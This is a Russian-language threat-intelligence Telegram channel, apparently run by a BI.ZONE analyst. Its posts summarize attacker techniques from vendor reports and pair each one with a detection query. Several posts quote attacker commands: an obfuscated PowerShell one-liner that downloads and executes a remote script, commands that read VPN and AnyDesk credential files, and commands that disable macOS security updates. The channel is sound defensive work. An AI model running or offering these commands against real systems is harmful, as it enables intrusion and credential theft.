- Последний пост
- 13 авг.
- Последнее чтение
- 12:46
- Постов за неделю
- 3
- Всего постов
- 23
- Тип
- открытый
- Язык
- русский
- В каталоге с
- 12 авг.
- 1/24сутки в ленте
- 327
- 1/48двое суток
- 374
- 1/72трое суток
- 404
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
Всем привет! Надеюсь, вы помните, что OFFZONE уже на следующей неделе. Сегодня я хочу немного рассказать вам про зону, за которую я отвечаю - Threat.Zone. Она посвящена исследованию и расследованию реальных кибератак, но в этом году вы услышите и пару интересных докладов, посвященных наступательной безопасности. В этом году спикеры расскажут про неочевидные источники криминалистических артефактов (и даже их злонамеренном использовании), интересных техниках злоумышленников, их многочисленных ошибках, а также о том, как выявить следы компрометации собственной ИТ-инфраструктуры, превратить киберразведданные в измеримую защиту, эффективно использовать ИИ в киберразведке, и о многом другом!. Увидимся 21 августа в GOELRO!
Всем привет! Сегодня посмотрим на пример того, как стремление атакующих избавиться от артефактов только добавляет шума. Более того, очень популярный пример. А его источником послужит отчет Zscaler о новом модульном трояне удаленного доступа Abyssos. Несмотря на то, что троян новый, он использует огромное количество хорошо известных техник. Например, в рамках реализации техники File Deletion (T1070.004) ВПО выполняет следующую команду: cmd.exe /C ping 127.0.0.1 -n 3 >nul & del /F /Q путь_к_файлу Несмотря на то, что в данном случае удаляется вредоносный файл, структура команды весьма специфическая, что предоставляет нам возможность для обнаружения: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("ping" AND "del") Более того, это далеко не первый образец, для которого свойственен подобный поведенческий маркер, что позволяет обнаруживать не только данное семейство, но и множество других. Скоро увидимся! English version
Всем привет! Туннели. Злоумышленники придумывают все новые и новые варианты их реализации. Сегодня мы снова взглянем на технику Protocol Tunneling (T1572). Существует масса бесплатных сервисов туннелирования, которые позволяют сделать локальный сервис доступным из интернета через публичный URL. Например, злоумышленники часто используют Cloudflare Tunnel. А вот согласно этому отчету, атакующие использовали и localhost[.]run. Обнаружить следы его использования можно, например, отслеживая коммуникации с поддоменами lhr[.]life: event_type: dnsreq* AND dns_rname: "lhr.life" Скоро увидимся! English version
Всем привет! Продолжаем разбираться, зачем нам нужны киберразведданные. И в этот раз поговорим о Threat Hunting: https://bi.zone/expertise/blog/proaktivnyy-poisk-ugroz-s-ispolzovaniem-kiberrazveddannykh/
Channel photo updated
Всем привет! Сегодня взглянем на то, как злоумышленники борются с обновлениями скомпрометированных систем в рамках техники Disable or Modify Tools (T1685). Более того, сегодня у нас в фокусе атаки на macOS. Давайте откроем отчет об активности XCSSET и пролистаем его до секции "Impairing Defenses". Как видите, злоумышленник использует следующие команды для отключения определенных механизмов обновлений безопасности Apple: defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false Первая команда отключает получение обновлений для обновлений XProtect, Gatekeeper и других защитных компонентов, вторая отключает установку Rapid Security Responses (RSR). В данном случае мы можем поискать события модификации файла com.apple.SoftwareUpdate.plist с помощью defaults: event_type: "processcreatemac" AND proc_file_path: "defaults" AND cmdline: "com.apple.SoftwareUpdate.plist" Скоро увидимся! English version
Всем привет! Нередко злоумышленникам удается извлечь аутентификационный материал из файлов, о технике Credentials In Files (T1552.001) мы и поговорим. Так, согласно отчету Kaspersky об активности кластера GOFFEE (Paper Werewolf), злоумышленники проявляли активный интерес к различным конфигурационным файлам, содержащим чувствительные данные, а именно: cmd.exe /c type "%APPDATA%\AnyDesk\service.conf" cmd.exe /c type "%USERPROFILE%\OpenVPN\config\avia\avia.ovpn" cmd.exe /c type "%APPDATA%\Kerio\VpnClient\user.cfg" cmd.exe /c dir "%USERPROFILE%\Downloads\Telegram Desktop" Подобная активность, разумеется, предоставляет нам возможности для проактивного поиска, например: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("type" OR "dir") AND cmdline: ("anydesk" OR "openvpn" OR "vpnclient" OR "telegram desktop") Скоро увидимся! English version
🌚 Core Werewolf меняет клыки: троян CoreRAT в атаках на российские организации С июня по июль 2026 года специалисты BI.ZONE Threat Intelligence зафиксировали активность кластера Core Werewolf. Эксперты выявили, что злоумышленники начали использовать ранее неизвестный троян удаленного доступа CoreRAT. В арсенале Core Werewolf уже встречались самописные мини-бэкдоры, однако CoreRAT — первый известный нам полноценный RAT их собственной разработки. ➡️Подробнее о кампаниях и техниках Core Werewolf 💬 Мы в MAX
Всем привет! Сегодня поговорим о тактиках Execution (TA0002) и Stealth (TA0005), и вариантах реализации техник PowerShell (T1059.001), JavaScript (T1059.007) и Mshta (T1218.005). Источником примеров для нас станет вот этот отчет об активности Kimsuky (Monolithic Werewolf). Начнем с вредоносных ярлыков, которые распространяли злоумышленники. Так как вредоносный код находился непосредственно в самом LNK-файле, mshta.exe запускался с ним в качестве аргумента, что предоставляет нам возможность для обнаружения: event_type: "processcreatewin" AND proc_file_path: "mshta.exe" AND cmdline: *.lnk Вредоносный код представлял собой дроппер, который создавал следующие файлы в скомпрометированной системе: “%APPDATA%\Microsoft\Windows\Templates\Templates.Js” “%APPDATA%\Microsoft\Windows\Templates\Templates.Ps1” При этом, первый служит для запуска второго. В данном случае мы можем использовать путь к этим файлам для проактичного поиска: event_type: "processcreatewin" AND proc_file_path: ("powershell.exe" OR "wscript.exe" OR "cscript.exe") AND cmdline: "Microsoft\\Windows\\Templates" Скоро увидимся! English version
🐕 Insolent Hyena атакует российские организации с помощью трояна NightWire и стилера Excalibur С января по июль 2026 года специалисты BI.ZONE Threat Intelligence исследовали активность кластера Insolent Hyena. Выяснилось, что злоумышленники активно взаимодействуют с кибершпионами и финансово мотивированными атакующими. Для атак использовались: 🔵ранее неизвестный троян удаленного доступа NightWire; 🔵стилер Excalibur, написанный на Python и обфусцированный с помощью PyArmor; 🔵средства удаленного администрирования NetSupport; 🔵троян удаленного доступа CapDoor; 🔵C2-фреймворки AdaptixC2 и Cobalt Strike. ➡️Подробнее о кампании и техниках Insolent Hyena
Всем привет! Давно мы не говорили об интересных техниках, связанных с модификацией реестра. Самое время исправиться! Сегодня поговорим о Cruciferra - криптере, который детально разобрали в своем отчете Proofpoint. ВПО модифицирует следующие параметры реестра: - ToastEnabled в Software\Microsoft\Windows\CurrentVersion\PushNotifications - Balloon в Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced - ShowInfoTip в Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Все эти параметры отвечают за различные оповещения пользователя, соотвсетвенно, их модификация позволяет атакующим спрятать от жертвы в том числе оповещения средств защиты. Таким образом, мы имеем еще несколько возможностей для обнаружения потенциально вредоносной активности: event_type: "registryvaluesetwin" AND reg_key_path: ("toastenabled" OR "balloon" OR "showinfotip") Скоро увидимся! English version
Всем привет! Продолжаем разбираться с угрозоцентричным подходом и практическим применением Threat Intelligence. В этот раз поговорим об одном из самых понятных сценариев применения - обнаружении угроз. Тем не менее, ограничиваться индикаторами компрометации мы, разумеется, не будем: https://bi.zone/expertise/blog/kak-ispolzovat-kiberrazveddannye-dlya-obnaruzheniya-ugroz/
Всем привет! Сегодня практически любая атака с использование программ-вымогателей предполагает эксфильтрацию данных. Часто атакующие используют одни и те же инструменты, но бывают и исключения. Например, согласно отчету Arctic Wolf Labs, атакующие, распространяющие вымогатель Qilin, использовали для эксфильтрации данных Proton Drive. Это облачное хранилище от швейцарской компании Proton, ориентированное на конфиденциальность. Его главная особенность — сквозное шифрование, при котором ваши файлы шифруются на устройстве до отправки в облако. Безусловно, данный инструмент может использоваться в ИТ-инфраструктуре легитимно, тем не менее, он также может быть предвестником развертывания вымогательского ПО, поэтому вполне подходит для проактивного поиска: event_type: "processcreatewin" AND proc_file_productname: "Proton Drive" Скоро увидимся! English version
Всем привет! Сегодня мы взглянем на очередной пример техники Remote Desktop Software (T1219.002). Примечательно, что используемый атакующими инструмент отсутствует в проекте LOLRMM. Согласно отчету Seqrite, в рамках кампании ShadowRecruit злоумышленники распространяли архивы, содержащие сразу несколько файлов: вредоносный ярлык, PowerShell-скрипт и исполняемый файл. Ярлык запускал PowerShell, который, помимо прочего, загружал и запускал инсталлятор легитимного средства удаленного доступа ControlR, который впоследствии мог использоваться атакующими как основной или резервный канал доступа к скомпрометированной системе. Во-первых, мы можем поискать сетевые коммуникации с инфраструктурой ControlR: event_type: "dnsreqwin" AND dns_rname: "controlr.app" Во-вторых, поискать следы работы агента, например: event_type: "processcreatewin" AND proc_file_productname: *controlr* Скоро увидимся! English version
Всем привет! Злоумышленники продолжают активно использовать технику EtherHiding, и сегодня мы посмотрим на очередной пример ее применения. Согласно отчету LevelBlue, атакующие распространяли вредоносные ярлыки, взаимодействие с которыми приводило к выполнению обфусцированной команды, например: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $Se4n4GmJ=[System.Numerics.BigInteger]\7330349723455890650683895074414054\;$fobLzAK0=[System.Numerics.BigInteger]\5070886814366709789648062014091648\;$YrXdQd=$Se4n4GmJ - $fobLzAK0;for($bwusN=100+156;$YrXdQd -ne 0;$YrXdQd=$YrXdQd / $bwusN){$JZwuEnBA+=[char]([int]($YrXdQd % $bwusN));};iwr $JZwuEnBA -OutFile $env:TEMP\lFdlPb.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\lFdlPb.ps1 Обратите внимание, что для обфускации в том числе используется тип BigInteger, что само по себе предоставляет нам возможность для проактивного поиска: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: *bigint* Загруженный сценарий предназначен для развертывания в скомпрометированной системе NodeJS-бэкдора, одной из функций которого является получение адреса командного сервера с использованием техники EtherHiding. При этом, в данном случае используется сервис TONAPI, например: hxxps://tonapi[.]io/v2/blockchain/accounts/0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9/methods/get_domain И это очередная возможность для проактивного поиска: event_type: "dnsreqwin" AND dns_rname: "tonapi.io" Скоро увидимся! English version
Всем привет! Очередные атакующие злоупотребляют легитимными средствами удаленного доступа - больше информации о тактиках, техниках и процедурах кластера Clubfoot Wolf в нашем новом исследовании: https://bi.zone/expertise/blog/clubfoot-wolf-massovo-komprometiruet-rossiyskie-kompanii/
Всем привет! Сегодня мы взглянем на еще один интересный пример того, как атакующие злоупотребляют браузером. В этот раз они использовали его, чтобы отвлечь жертву. Согласно этому отчету, для того, чтобы отвлечь пользователя и получить время, необходимое для корректного выполнения скриптов, злоумышленники использовали сервис fakeupdate[.]net, который позволяет продемонстрировать поддельное окно обновления Windows. При этом, атакующие запускали Microsoft Edge в режиме kiosk: start msedge.exe --kiosk https://fakeupdate[.]net/win10ue --edge-kiosk-type=fullscreen Разумеется, атакующие могут разместить похожие страницы и на собственных серверах, тем не менее, подобный режим запуска браузера предоставляет на возможность для поиска подозрительной активности: event_type: "processcreatewin" AND proc_file_path: "msedge.exe" AND cmdline: ("kiosk" AND "fullscreen") Скоро увидимся! English version
Всем привет! Сегодня поговорим о не самом типичном методе закрепления в скомпрометированной системе, а именно Browser Extensions (T1176.001). Согласно данному отчету, злоумышленники использовали Microsoft Teams и представлялись сотрудниками ИТ, чтобы убедить жертву перейти на фишинговый сайт. Фишинговые сайты распространяли вредоносные скрипты: AutoHotKey, Batch или PowerShell. Такой скрипт распаковывал все компоненты ВПО, в том числе Python-бэкдор и расширение для браузера. Также создавалась задача в планировщике, которая запускала Microsoft Edge со следующими параметрами: --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\User Data\Recovery" --load-extension="%EXTENSION_DIR%" --no-first-run --disable-sync --headless=new Как видите, злоумышленники, помимо прочего, указывали альтернативную пользовательскую директорию (--user-data-dir) и загружали вредоносное расширение (--load-extension), эти параметры мы и можем использовать для поиска подозрительной активности: event_type: "processcreatewin" AND proc_file_path: "msedge.exe" AND cmdline: ("user-data-dir" AND "load-extension") Скоро увидимся! English version
Всем привет! Злоумышленники все чаще используют оригинальные веб-сервисы для размещения вредоносных файлов, и сегодня мы взглянем на очередной пример - Storj. Согласно данному отчету, атакующие использовали малвертайзинг для распространения загрузчика OXLOADER. При этом, для хранения вредоносных файлов злоумышленники использовали сервис Storj, например: link[.]storjshare[.]io/raw/jwwvr4oskkkjsgevt774ta62ehya/ruslan/aBsvwbdas.exe Как и с другими подобными сервисами, мы можем поискать подозрительные взаимодействия с ними: event_type: "dnsreq" AND dns_rname: "storjshare.io" Ну, или просто заблокировать доступ к нему - тогда вредоносные файлы просто не смогут быть загружены пользователем. Скоро увидимся! English version
Всем привет! Мои коллеги очень активно исследуют различные теневые ресурсы. И недавно мы проанализировали, как злоумышленники обсуждают применение искусственного интеллекта, планируя кибератаки. Результаты проведенного анализа уже доступны в нашем новом отчете - Threat Zone 2026: Dark AI. https://bi.zone/expertise/research/threat-zone-2026-dark-ai/